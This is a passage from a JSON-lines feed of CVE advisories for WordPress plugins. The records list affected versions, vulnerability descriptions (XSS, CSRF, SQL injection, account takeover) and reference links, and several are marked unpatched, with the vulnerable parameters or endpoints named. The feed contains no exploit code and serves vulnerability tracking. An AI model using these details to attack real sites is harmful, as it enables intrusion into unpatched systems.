{"CVE_ID":"CVE-2024-6930","slug":"booking","versionImpact":"10.2.1","description":"The WP Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'type' attribute within the plugin's bookingform shortcode in all versions up to, and including, 10.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2aaca776-03ce-43bb-9553-f455f57124a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2aaca776-03ce-43bb-9553-f455f57124a3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/core\\\/lib\\\/wpdev-booking-class.php#L849\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/core\\\/lib\\\/wpdev-booking-class.php#L849\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/booking\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/booking\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123628\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123628\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8485","slug":"rest-api-to-miniprogram","versionImpact":"4.7.1","description":"The REST API TO MiniProgram plugin for WordPress is vulnerable to privilege escalation via account takeovr in all versions up to, and including, 4.7.1 via the updateUserInfo() due to missing validation on the 'openid' user controlled key that determines what user will be updated. This makes it possible for unauthenticated attackers to update arbitrary user's accounts, including their email to a @weixin.com email, which can the be leveraged to reset the password of the user's account, including administrators.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b53066d3-2ff3-4460-896a-facd77455914?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b53066d3-2ff3-4460-896a-facd77455914?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rest-api-to-miniprogram\\\/tags\\\/4.7.0\\\/includes\\\/api\\\/ram-rest-weixin-controller.php#L264\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rest-api-to-miniprogram\\\/tags\\\/4.7.0\\\/includes\\\/api\\\/ram-rest-weixin-controller.php#L264\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31569","slug":"related-posts-list-grid-and-slider-all-in-one","versionImpact":"3.0.0.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in wp-buy wordpress related Posts with thumbnails allows Stored XSS. This issue affects wordpress related Posts with thumbnails: from n\/a through 3.0.0.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/related-posts-list-grid-and-slider-all-in-one\\\/vulnerability\\\/wordpress-wordpress-related-posts-with-thumbnails-plugin-3-0-0-1-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/related-posts-list-grid-and-slider-all-in-one\\\/vulnerability\\\/wordpress-wordpress-related-posts-with-thumbnails-plugin-3-0-0-1-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2893","slug":"gutenverse","versionImpact":"2.2.1","description":"The Gutenverse \u2013 Ultimate Block Addons and Page Builder for Site Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's countdown Block in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gutenverse\\\/tags\\\/2.2.1\\\/assets\\\/js\\\/blocks.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gutenverse\\\/tags\\\/2.2.1\\\/assets\\\/js\\\/blocks.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3281650\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3281650\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gutenverse\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gutenverse\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/690e7f00-d9db-4912-9438-7fcbcb026800?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/690e7f00-d9db-4912-9438-7fcbcb026800?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5568","slug":"mage-eventpress","versionImpact":"4.4.2","description":"The WpEvently plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in all versions up to, and including, 4.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/magepeopleteam\\\/mage-eventpress\\\/commit\\\/c6f8d3233087881d3eb7ed3ebe9a6ebc7795f144\",\"name\":\"https:\\\/\\\/github.com\\\/magepeopleteam\\\/mage-eventpress\\\/commit\\\/c6f8d3233087881d3eb7ed3ebe9a6ebc7795f144\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3307484\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3307484\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mage-eventpress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mage-eventpress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3659c4d-3a19-4f74-9f6d-26d7b24ebe56?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3659c4d-3a19-4f74-9f6d-26d7b24ebe56?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0942","slug":"woocommerce-for-japan","versionImpact":"2.5.4","description":"The Japanized For WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018tab\u2019 parameter in versions up to, and including, 2.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-for-japan\\\/trunk\\\/includes\\\/admin\\\/views\\\/html-admin-setting-screen.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-for-japan\\\/trunk\\\/includes\\\/admin\\\/views\\\/html-admin-setting-screen.php#L63\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb606a30-2f7c-41e9-9ebc-9f1b0b84fff8\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb606a30-2f7c-41e9-9ebc-9f1b0b84fff8\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2868545%40woocommerce-for-japan%2Ftrunk&old=2863064%40woocommerce-for-japan%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2868545%40woocommerce-for-japan%2Ftrunk&old=2863064%40woocommerce-for-japan%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4364","slug":"wp-jobsearch","versionImpact":"1.8.1","description":"The JobSearch WP Job Board plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the jobsearch_add_job_import_schedule_call() function in versions up to, and including, 1.8.1. This makes it possible for authenticated attackers to add and\/or modify schedule calls.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9114018f-0678-4973-bb1e-932f0d93f963?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9114018f-0678-4973-bb1e-932f0d93f963?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7e2dd5df-f758-419c-bfb8-b8e53235fede\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7e2dd5df-f758-419c-bfb8-b8e53235fede\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-jobsearch-wp-job-board-plugin-fixed-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-jobsearch-wp-job-board-plugin-fixed-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4402","slug":"multiple-roles","versionImpact":"1.3.1","description":"The Multiple Roles plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.1. This is due to missing or incorrect nonce validation on the mu_add_roles_in_signup_meta() and mu_add_roles_in_signup_meta_recently() functions. This makes it possible for unauthenticated attackers to add additional roles to users via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/862fa0c3-c16f-493e-9bf6-92debc0e30f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/862fa0c3-c16f-493e-9bf6-92debc0e30f6?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2556328%40multiple-roles&new=2556328%40multiple-roles&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2556328%40multiple-roles&new=2556328%40multiple-roles&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1366","slug":"happy-elementor-addons","versionImpact":"3.10.3","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018archive_title_tag\u2019 attribute of the Archive Title widget in all versions up to, and including, 3.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08208cb1-2d57-49f9-8ac7-b59caa0cf5fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08208cb1-2d57-49f9-8ac7-b59caa0cf5fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3044937\\\/happy-elementor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3044937\\\/happy-elementor-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4530","slug":"business-card-by-esterox-100","versionImpact":"1.0.0","description":"The Business Card WordPress plugin through 1.0.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions such as editing card categories via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/952f6b5c-7728-4c87-8826-6b493f51a979\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/952f6b5c-7728-4c87-8826-6b493f51a979\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6629","slug":"all-in-one-video-gallery","versionImpact":"3.7.1","description":"The All-in-One Video Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Video shortcode in all versions up to, and including, 3.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6e6fda8-e998-4087-8a21-9edb2a0249c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6e6fda8-e998-4087-8a21-9edb2a0249c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-video-gallery\\\/trunk\\\/public\\\/video.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-video-gallery\\\/trunk\\\/public\\\/video.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/all-in-one-video-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/all-in-one-video-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123171\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123171\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123171\\\/all-in-one-video-gallery\\\/trunk\\\/public\\\/video.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123171\\\/all-in-one-video-gallery\\\/trunk\\\/public\\\/video.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8484","slug":"rest-api-to-miniprogram","versionImpact":"4.7.1","description":"The REST API TO MiniProgram plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the \/wp-json\/watch-life-net\/v1\/comment\/getcomments REST API endpoint in all versions up to, and including, 4.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e0945eb-ceec-4536-822a-fe864c21b580?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e0945eb-ceec-4536-822a-fe864c21b580?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rest-api-to-miniprogram\\\/tags\\\/4.7.0\\\/includes\\\/api\\\/ram-rest-comments-controller.php#L247\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rest-api-to-miniprogram\\\/tags\\\/4.7.0\\\/includes\\\/api\\\/ram-rest-comments-controller.php#L247\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9502","slug":"master-addons","versionImpact":"2.0.6.7","description":"The Master Addons \u2013 Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Tooltip module in all versions up to, and including, 2.0.6.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/master-addons.com\\\/changelogs\\\/\",\"name\":\"https:\\\/\\\/master-addons.com\\\/changelogs\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-tooltip\\\/ma-tooltip.php#L250\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/addons\\\/ma-tooltip\\\/ma-tooltip.php#L250\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211489\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211489\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/485c9ee6-9cb5-45ca-86af-ee5d10ee6734?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/485c9ee6-9cb5-45ca-86af-ee5d10ee6734?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31562","slug":"uptime-robot-monitor","versionImpact":"2.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aphotrax Uptime Robot Plugin for WordPress allows DOM-Based XSS. This issue affects Uptime Robot Plugin for WordPress: from n\/a through 2.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/uptime-robot-monitor\\\/vulnerability\\\/wordpress-uptime-robot-plugin-for-wordpress-plugin-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/uptime-robot-monitor\\\/vulnerability\\\/wordpress-uptime-robot-plugin-for-wordpress-plugin-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12750","slug":"competition-form","versionImpact":"2.0","description":"The Competition Form WordPress plugin through 2.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3570bdc-659f-4a03-96f8-b4f9f045f910\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3570bdc-659f-4a03-96f8-b4f9f045f910\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4363","slug":"wp-quick-front-end-editor","versionImpact":"5.5","description":"The WP Quick FrontEnd Editor plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 5.5 due to insufficient input sanitization and output escaping on the 'save_content_front' function that uses print_r on the user-supplied $_REQUEST values . This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-quick-front-end-editor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-quick-front-end-editor\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-in-wordpress-wp-quick-frontend-editor-plugin-unpatched\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-in-wordpress-wp-quick-frontend-editor-plugin-unpatched\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ce8ae7d-c2a5-4da3-8bdd-20dfdb5ce700?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ce8ae7d-c2a5-4da3-8bdd-20dfdb5ce700?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4401","slug":"analogwp-templates","versionImpact":"1.8.0","description":"The Style Kits plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.8.0. This is due to missing or incorrect nonce validation on the update_posts_stylekit() function. This makes it possible for unauthenticated attackers to update style kits for posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473676\\\/analogwp-templates\\\/trunk\\\/inc\\\/class-quick-edit.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2473676\\\/analogwp-templates\\\/trunk\\\/inc\\\/class-quick-edit.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cb08fc1-fb8b-4478-8569-eb9b28aff50b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cb08fc1-fb8b-4478-8569-eb9b28aff50b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5653","slug":"wassup","versionImpact":"1.9.4.5","description":"The WassUp Real Time Analytics WordPress plugin through 1.9.4.5 does not escape IP address provided via some headers before outputting them back in an admin page, allowing unauthenticated users to perform Stored XSS attacks against logged in admins","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76316621-1987-44ea-83e5-6ca884bdd1c0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76316621-1987-44ea-83e5-6ca884bdd1c0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1170","slug":"buddyforms","versionImpact":"2.8.7","description":"The Post Form \u2013 Registration Form \u2013 Profile Form for User Profiles \u2013 Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to unauthorized media file deletion due to a missing capability check on the handle_deleted_media function in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to delete arbitrary media 